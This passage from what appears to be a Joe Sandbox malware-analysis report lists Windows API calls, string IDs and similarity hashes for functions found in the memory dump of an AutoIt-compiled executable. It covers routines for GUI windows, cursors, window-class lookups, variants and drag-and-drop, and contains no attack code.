                                                          • _wcscat.LIBCMT ref: 002B4A88
                                                          • _wcsncpy.LIBCMT ref: 002B4AB3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                          • API String ID: 699586101-1459072770
                                                          • Opcode ID: fe6cafcbdb288dc44e1783cd37de8c6f9307de569e8efc5ec61b680f99d944e6
                                                          • Instruction ID: 5ef9e454826bfe05705977e1d1d87f730da3079b1a0e75977b5ab3c1dc56a490
                                                          • Opcode Fuzzy Hash: fe6cafcbdb288dc44e1783cd37de8c6f9307de569e8efc5ec61b680f99d944e6
                                                          • Instruction Fuzzy Hash: EE414B72A60205BBDB14BB749C87EFFB76CDF41350F004056F909A6183EB70DA319AA5
                                                          APIs
                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00252C8C
                                                          • GetSystemMetrics.USER32(00000007), ref: 00252C94
                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00252CBF
                                                          • GetSystemMetrics.USER32(00000008), ref: 00252CC7
                                                          • GetSystemMetrics.USER32(00000004), ref: 00252CEC
                                                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00252D09
                                                          • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00252D19
                                                          • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00252D4C
                                                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00252D60
                                                          • GetClientRect.USER32(00000000,000000FF), ref: 00252D7E
                                                          • GetStockObject.GDI32(00000011), ref: 00252D9A
                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00252DA5
                                                            • Part of subcall function 00252714: GetCursorPos.USER32(?), ref: 00252727
                                                            • Part of subcall function 00252714: ScreenToClient.USER32(003177B0,?), ref: 00252744
                                                            • Part of subcall function 00252714: GetAsyncKeyState.USER32(00000001), ref: 00252769
                                                            • Part of subcall function 00252714: GetAsyncKeyState.USER32(00000002), ref: 00252777
                                                          • SetTimer.USER32(00000000,00000000,00000028,002513C7), ref: 00252DCC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                          • String ID: AutoIt v3 GUI$h.
                                                          • API String ID: 1458621304-2189462632
                                                          • Opcode ID: c4186814d6f16d8560923d23d8f4e85edb6d5bd9edb97730a0d3fa381c9b9671
                                                          • Instruction ID: 8816356125713801f9c82492c686c95c34adb812c4f729ccb5c99cbfe1adbe0f
                                                          • Opcode Fuzzy Hash: c4186814d6f16d8560923d23d8f4e85edb6d5bd9edb97730a0d3fa381c9b9671
                                                          • Instruction Fuzzy Hash: FEB16C7565020ADFDB15DFA8DC89BAD7BB4FB08311F104129FA15A72D0CB70A8A5CF64
                                                          APIs
                                                            • Part of subcall function 00261821: _memmove.LIBCMT ref: 0026185B
                                                          • GetForegroundWindow.USER32(002E0980,?,?,?,?,?), ref: 002704E3
                                                          • IsWindow.USER32(?), ref: 002A66BB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Window$Foreground_memmove
                                                          • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                          • API String ID: 3828923867-1919597938
                                                          • Opcode ID: b6f0e971d14fc7ffdc78210c08d3ef81848376690d1f76fd0800c70fed0e3c7f
                                                          • Instruction ID: 015c227852a366803c474850405f5d9bd5bb8bcbf8d7c9296e1d971e8ff4642f
                                                          • Opcode Fuzzy Hash: b6f0e971d14fc7ffdc78210c08d3ef81848376690d1f76fd0800c70fed0e3c7f
                                                          • Instruction Fuzzy Hash: A8D1B130124702DBCB14EF20C8959AABBB5FF56344F188A19E459471A2CF70F9B9CF92
                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?), ref: 002D44AC
                                                          • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 002D456C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: BuffCharMessageSendUpper
                                                          • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                          • API String ID: 3974292440-719923060
                                                          • Opcode ID: 170995f93821e0cdcfc3520c698831b7087d59e85b6da9dddb4f10a45d980c6b
                                                          • Instruction ID: c9e4df8598c1ae72cdfd23d99e79776ef3cfc458cb8bc1b1d2c75cede36d1fa8
                                                          • Opcode Fuzzy Hash: 170995f93821e0cdcfc3520c698831b7087d59e85b6da9dddb4f10a45d980c6b
                                                          • Instruction Fuzzy Hash: 36A170342343119FCB14FF20C891A6AB3A5EF89314F148969B8965B3D2DB70ED69CF51
                                                          APIs
                                                          • LoadCursorW.USER32(00000000,00007F89), ref: 002C56E1
                                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 002C56EC
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 002C56F7
                                                          • LoadCursorW.USER32(00000000,00007F03), ref: 002C5702
                                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 002C570D
                                                          • LoadCursorW.USER32(00000000,00007F01), ref: 002C5718
                                                          • LoadCursorW.USER32(00000000,00007F81), ref: 002C5723
                                                          • LoadCursorW.USER32(00000000,00007F88), ref: 002C572E
                                                          • LoadCursorW.USER32(00000000,00007F80), ref: 002C5739
                                                          • LoadCursorW.USER32(00000000,00007F86), ref: 002C5744
                                                          • LoadCursorW.USER32(00000000,00007F83), ref: 002C574F
                                                          • LoadCursorW.USER32(00000000,00007F85), ref: 002C575A
                                                          • LoadCursorW.USER32(00000000,00007F82), ref: 002C5765
                                                          • LoadCursorW.USER32(00000000,00007F84), ref: 002C5770
                                                          • LoadCursorW.USER32(00000000,00007F04), ref: 002C577B
                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 002C5786
                                                          • GetCursorInfo.USER32(?), ref: 002C5796
                                                          • GetLastError.KERNEL32(00000001,00000000), ref: 002C57C1
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Cursor$Load$ErrorInfoLast
                                                          • String ID:
                                                          • API String ID: 3215588206-0
                                                          • Opcode ID: 16bbce98bccdc6775f2bda022a6e8aaefc4f33d80fc8c955d73fb5e4eccbd382
                                                          • Instruction ID: 33b52563226534661d1e472ea17bb8ea94578e42a0e55b0fb1947056e4c6357f
                                                          • Opcode Fuzzy Hash: 16bbce98bccdc6775f2bda022a6e8aaefc4f33d80fc8c955d73fb5e4eccbd382
                                                          • Instruction Fuzzy Hash: A9418670E043196ADF109FB68C49D6EFFF8EF41B10B10462FE509E7290DAB8A541CE91
                                                          APIs
                                                          • GetClassNameW.USER32(?,?,00000100), ref: 002AB17B
                                                          • __swprintf.LIBCMT ref: 002AB21C
                                                          • _wcscmp.LIBCMT ref: 002AB22F
                                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 002AB284
                                                          • _wcscmp.LIBCMT ref: 002AB2C0
                                                          • GetClassNameW.USER32(?,?,00000400), ref: 002AB2F7
                                                          • GetDlgCtrlID.USER32(?), ref: 002AB349
                                                          • GetWindowRect.USER32(?,?), ref: 002AB37F
                                                          • GetParent.USER32(?), ref: 002AB39D
                                                          • ScreenToClient.USER32(00000000), ref: 002AB3A4
                                                          • GetClassNameW.USER32(?,?,00000100), ref: 002AB41E
                                                          • _wcscmp.LIBCMT ref: 002AB432
                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 002AB458
                                                          • _wcscmp.LIBCMT ref: 002AB46C
                                                            • Part of subcall function 0027385C: _iswctype.LIBCMT ref: 00273864
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                          • String ID: %s%u
                                                          • API String ID: 3744389584-679674701
                                                          • Opcode ID: c4bcd53056b5aa39924abcfabda83d5caa8d021726164734aca0f22329d386d0
                                                          • Instruction ID: b06725c09eac9f317b01abf222521f52e4ff6e05d385d5a78c2e7c13adcce898
                                                          • Opcode Fuzzy Hash: c4bcd53056b5aa39924abcfabda83d5caa8d021726164734aca0f22329d386d0
                                                          • Instruction Fuzzy Hash: 16A10171224707AFDB16DF20C894BAAB7E8FF4A314F008519F999C2192DB30E965CB91
                                                          APIs
                                                          • GetClassNameW.USER32(00000008,?,00000400), ref: 002ABAB1
                                                          • _wcscmp.LIBCMT ref: 002ABAC2
                                                          • GetWindowTextW.USER32(00000001,?,00000400), ref: 002ABAEA
                                                          • CharUpperBuffW.USER32(?,00000000), ref: 002ABB07
                                                          • _wcscmp.LIBCMT ref: 002ABB25
                                                          • _wcsstr.LIBCMT ref: 002ABB36
                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 002ABB6E
                                                          • _wcscmp.LIBCMT ref: 002ABB7E
                                                          • GetWindowTextW.USER32(00000002,?,00000400), ref: 002ABBA5
                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 002ABBEE
                                                          • _wcscmp.LIBCMT ref: 002ABBFE
                                                          • GetClassNameW.USER32(00000010,?,00000400), ref: 002ABC26
                                                          • GetWindowRect.USER32(00000004,?), ref: 002ABC8F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                          • String ID: @$ThumbnailClass
                                                          • API String ID: 1788623398-1539354611
                                                          • Opcode ID: beba213cef21e1e5e49383a99a317b4554a71968990404ac02ed534f7bf42f33
                                                          • Instruction ID: 0e8ff7ed0941ed6fe859a3a2bae1278bc303588c53f16d5ca4262871b1452713
                                                          • Opcode Fuzzy Hash: beba213cef21e1e5e49383a99a317b4554a71968990404ac02ed534f7bf42f33
                                                          • Instruction Fuzzy Hash: B681AD710242469FDB06CF10D885FAAB7E9EF45324F04856AFD898A096DF30EDA5CB61
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: __wcsnicmp
                                                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                          • API String ID: 1038674560-1810252412
                                                          • Opcode ID: 9d9757937834ad36ea982d8084bc228a32946993f6449c78b3dd9baba15577be
                                                          • Instruction ID: d8cc4ee064517acaac44f6d2a366984e886bc36231b7ca2586f3448f776dc28d
                                                          • Opcode Fuzzy Hash: 9d9757937834ad36ea982d8084bc228a32946993f6449c78b3dd9baba15577be
                                                          • Instruction Fuzzy Hash: 32310231A6170AA7DB06EAA0DC53EEE73B4AF12750F640125F540B10D2EF626E74CE42
                                                          APIs
                                                          • LoadIconW.USER32(00000063), ref: 002ACBAA
                                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 002ACBBC
                                                          • SetWindowTextW.USER32(?,?), ref: 002ACBD3
                                                          • GetDlgItem.USER32(?,000003EA), ref: 002ACBE8
                                                          • SetWindowTextW.USER32(00000000,?), ref: 002ACBEE
                                                          • GetDlgItem.USER32(?,000003E9), ref: 002ACBFE
                                                          • SetWindowTextW.USER32(00000000,?), ref: 002ACC04
                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 002ACC25
                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 002ACC3F
                                                          • GetWindowRect.USER32(?,?), ref: 002ACC48
                                                          • SetWindowTextW.USER32(?,?), ref: 002ACCB3
                                                          • GetDesktopWindow.USER32 ref: 002ACCB9
                                                          • GetWindowRect.USER32(00000000), ref: 002ACCC0
                                                          • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 002ACD0C
                                                          • GetClientRect.USER32(?,?), ref: 002ACD19
                                                          • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 002ACD3E
                                                          • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 002ACD69
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                          • String ID:
                                                          • API String ID: 3869813825-0
                                                          • Opcode ID: d9f79c32aa14fa7b49ae5d6aa85c0e3545618aa12e428901418a4820af8ab859
                                                          • Instruction ID: fb4013179097cf44ead66e844d33ca69ef5ebfbec26038e78f80fd0de095972a
                                                          • Opcode Fuzzy Hash: d9f79c32aa14fa7b49ae5d6aa85c0e3545618aa12e428901418a4820af8ab859
                                                          • Instruction Fuzzy Hash: 56519F7090070AEFDB20DFA8DE89B6EBBF5FF04704F100929E546A65A0CB75A865CF50
                                                          APIs
                                                          • _memset.LIBCMT ref: 002DA87E
                                                          • DestroyWindow.USER32(00000000,?), ref: 002DA8F8
                                                            • Part of subcall function 00261821: _memmove.LIBCMT ref: 0026185B
                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 002DA972
                                                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 002DA994
                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002DA9A7
                                                          • DestroyWindow.USER32(00000000), ref: 002DA9C9
                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00250000,00000000), ref: 002DAA00
                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002DAA19
                                                          • GetDesktopWindow.USER32 ref: 002DAA32
                                                          • GetWindowRect.USER32(00000000), ref: 002DAA39
                                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 002DAA51
                                                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 002DAA69
                                                            • Part of subcall function 002529AB: GetWindowLongW.USER32(?,000000EB), ref: 002529BC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                          • String ID: 0$tooltips_class32
                                                          • API String ID: 1297703922-3619404913
                                                          • Opcode ID: bbc1ed7cae0fcc3d89806db79f051eaf25e2e1fa338d34d1166fbd724ee77ac0
                                                          • Instruction ID: 251c239a5db19b594bb06dee6d52935440f4dec9e317960e3ccc5cab07a88f55
                                                          • Opcode Fuzzy Hash: bbc1ed7cae0fcc3d89806db79f051eaf25e2e1fa338d34d1166fbd724ee77ac0
                                                          • Instruction Fuzzy Hash: 2A71AB70160241AFD721CF28C899FA677F9FB88300F08461EF9858B3A0D771AD62CB52
                                                          APIs
                                                            • Part of subcall function 002529E2: GetWindowLongW.USER32(?,000000EB), ref: 002529F3
                                                          • DragQueryPoint.SHELL32(?,?), ref: 002DCCCF
                                                            • Part of subcall function 002DB1A9: ClientToScreen.USER32(?,?), ref: 002DB1D2
                                                            • Part of subcall function 002DB1A9: GetWindowRect.USER32(?,?), ref: 002DB248
                                                            • Part of subcall function 002DB1A9: PtInRect.USER32(?,?,002DC6BC), ref: 002DB258
                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 002DCD38
                                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 002DCD43
                                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 002DCD66
                                                          • _wcscat.LIBCMT ref: 002DCD96
                                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 002DCDAD
                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 002DCDC6
                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 002DCDDD
                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 002DCDFF
                                                          • DragFinish.SHELL32(?), ref: 002DCE06
                                                          • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 002DCEF9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                          • API String ID: 169749273-3440237614
                                                          • Opcode ID: 34d081aaf5a6ad6436676a104c7c2d813717d4d8d74b10268c3490aea967702c
                                                          • Instruction ID: fd05e8b7c742e1db9d2302937f8cb187055ba4969195dd4a5af814fb30cc035a
                                                          • Opcode Fuzzy Hash: 34d081aaf5a6ad6436676a104c7c2d813717d4d8d74b10268c3490aea967702c
                                                          • Instruction Fuzzy Hash: 02617B71118341AFC701EF50DC89D9BBBF8EF88350F000A1EF595962A1DB709A59CF66
                                                          APIs
                                                          • VariantInit.OLEAUT32(00000000), ref: 002B831A
                                                          • VariantCopy.OLEAUT32(00000000,?), ref: 002B8323
                                                          • VariantClear.OLEAUT32(00000000), ref: 002B832F
                                                          • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 002B841D
                                                          • __swprintf.LIBCMT ref: 002B844D
                                                          • VarR8FromDec.OLEAUT32(?,?), ref: 002B8479
                                                          • VariantInit.OLEAUT32(?), ref: 002B852A
                                                          • SysFreeString.OLEAUT32(?), ref: 002B85BE
                                                          • VariantClear.OLEAUT32(?), ref: 002B8618
                                                          • VariantClear.OLEAUT32(?), ref: 002B8627
                                                          • VariantInit.OLEAUT32(00000000), ref: 002B8665
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                          • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                          • API String ID: 3730832054-3931177956
                                                          • Opcode ID: af8ce8f5f0f624896c69f3f6f5469b164c08518de54748af09446ec88c0890ae
                                                          • Instruction ID: 17939b3d2d7d2ab4741c3a06226825e3fff989c51dd835dc811c026b122f05ca
                                                          • Opcode Fuzzy Hash: af8ce8f5f0f624896c69f3f6f5469b164c08518de54748af09446ec88c0890ae
                                                          • Instruction Fuzzy Hash: 0AD1E331624516DBDB209F65C894BAEB7FCFF04780F188195E409AB281DFB4EC64DBA1
                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?), ref: 002D4A61
                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 002D4AAC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: BuffCharMessageSendUpper
                                                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                          • API String ID: 3974292440-4258414348
                                                          • Opcode ID: c0c0799f2b6243d522c8a1250755cb88d65ec15494232ad112a4f65496297089
                                                          • Instruction ID: c8b99c8e9e5e3e54043fea3a0d538a93109c62775a0a662200f625340a282e53
                                                          • Opcode Fuzzy Hash: c0c0799f2b6243d522c8a1250755cb88d65ec15494232ad112a4f65496297089
                                                          • Instruction Fuzzy Hash: 32918E342347019FCB14FF20C491A6EB7A1AF94358F14895AF8965B3A2CB31ED69CF85
                                                          APIs
